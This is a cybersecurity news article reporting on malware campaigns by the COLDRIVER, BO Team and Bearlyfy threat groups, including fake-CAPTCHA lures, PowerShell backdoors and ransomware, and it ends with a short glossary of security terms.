Netcrook Logo
👤 NEONPALADIN
🗓️ 14 Sep 2025   🌍 North America

Malware Crossfire: COLDRIVER, BO Team, and Bearlyfy Ignite a New Russian Cyber Battlefield

Three threat groups - COLDRIVER, BO Team, and Bearlyfy - unleash fresh waves of cyberattacks, signaling a volatile new chapter in Russia-focused digital warfare.

Fast Facts

  • COLDRIVER (aka Callisto) deploys new malware families - BAITSWITCH and SIMPLEFIX - using deceptive CAPTCHA lures.
  • BO Team targets Russian companies with revamped backdoors and phishing campaigns.
  • Bearlyfy, a newer player, escalates ransomware attacks against Russian firms, demanding cryptocurrency ransoms.
  • All three groups show growing technical sophistication, exploiting both human behavior and software flaws.
  • Geopolitical motives and shifting alliances blur the lines between cybercrime and cyberwarfare.

The Scene: Digital Deception and Escalation

Imagine a digital chessboard where each move is a trap, and every pawn is a potential spy. In recent months, Russia’s cyber landscape has turned into a high-stakes battleground, with multiple threat groups launching sophisticated attacks against both Russian targets and civil society figures connected to the country. COLDRIVER, BO Team, and Bearlyfy - each with their own playbook - are now shaping a new era of digital conflict, where malware is the weapon and deception is the strategy.

COLDRIVER’s ClickFix Gambit: Malware Hidden in Plain Sight

COLDRIVER, also known as Callisto or Star Blizzard, has been a persistent ghost in Western and Russian cyber corridors since 2019. Their latest campaign, uncovered by Zscaler ThreatLabz, uses a familiar but effective ruse: fake CAPTCHA prompts. Victims, believing they’re verifying their identity, are tricked into running a malicious Windows file. This first-stage malware, BAITSWITCH, quietly downloads a second program called SIMPLEFIX - a PowerShell backdoor that gives attackers remote control.

The technical wizardry is subtle but deadly. BAITSWITCH reaches out to attacker-controlled websites, fetches further malware, and erases its own tracks by scrubbing evidence from the system. SIMPLEFIX then sniffs around the victim’s files, searching for sensitive documents and sending back the spoils to its controllers. COLDRIVER’s focus remains tightly aligned with its past: targeting NGOs, exiled Russians, and civil society groups, often those critical of the Kremlin.

BO Team and Bearlyfy: New Faces, Familiar Tactics

While COLDRIVER perfects its art of deception, BO Team - sometimes called Black Owl or Hoody Hyena - has been phishing Russian companies with password-protected malware. Their latest trick: delivering a C#-rewritten BrockenDoor backdoor and the multifunctional ZeronetKit, capable of remote spying, data theft, and even tunneling through networks. Notably, ZeronetKit can’t survive alone; it relies on BrockenDoor to ensure it runs every time a computer starts.

Enter Bearlyfy, a group that started with small-time ransomware attacks but quickly leveled up to bigger targets. Their weapon of choice? Notorious ransomware strains like LockBit 3.0 and Babuk. Bearlyfy exploits software flaws - sometimes piggybacking on vulnerable partners - to break in, encrypt data, and demand cryptocurrency ransoms. While the sums are often modest, enough victims pay up to make the attacks worthwhile. Analysts spot echoes of the pro-Ukrainian PhantomCore group in Bearlyfy’s infrastructure, hinting at a tangled web of alliances and motives.

Geopolitics and the New Rules of Cyber Conflict

The convergence of these campaigns signals more than technical evolution; it’s a symptom of a shifting geopolitical chess game. Where once Russian companies and officials were the hunters, they’re now increasingly the hunted - by adversaries both foreign and homegrown, some possibly driven by nationalist, political, or even vigilante motives. The lines between espionage, activism, and outright crime grow blurrier by the day, leaving organizations caught in the crossfire of a digital shadow war.

As Russia’s cyber defenses are tested from all sides, these overlapping malware campaigns serve as a stark reminder: in the world of cyber conflict, today’s predator can be tomorrow’s prey. The only certainty is that the rules are changing, and everyone is a potential target.

WIKICROOK

  • Advanced Persistent Threat (APT): An Advanced Persistent Threat (APT) is a prolonged, targeted cyberattack by skilled groups, often state-backed, aiming to steal data or disrupt operations.
  • Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
  • Backdoor: A backdoor is a hidden way to access a computer or server, bypassing normal security checks, often used by attackers to gain secret control.
  • PowerShell: PowerShell is a Windows scripting tool used for automation, but attackers often exploit it to perform malicious actions stealthily.
  • Ransomware: Ransomware is malicious software that encrypts or locks data, demanding payment from victims to restore access to their files or systems.
NEONPALADIN NEONPALADIN
Cyber Resilience Engineer
← Back to news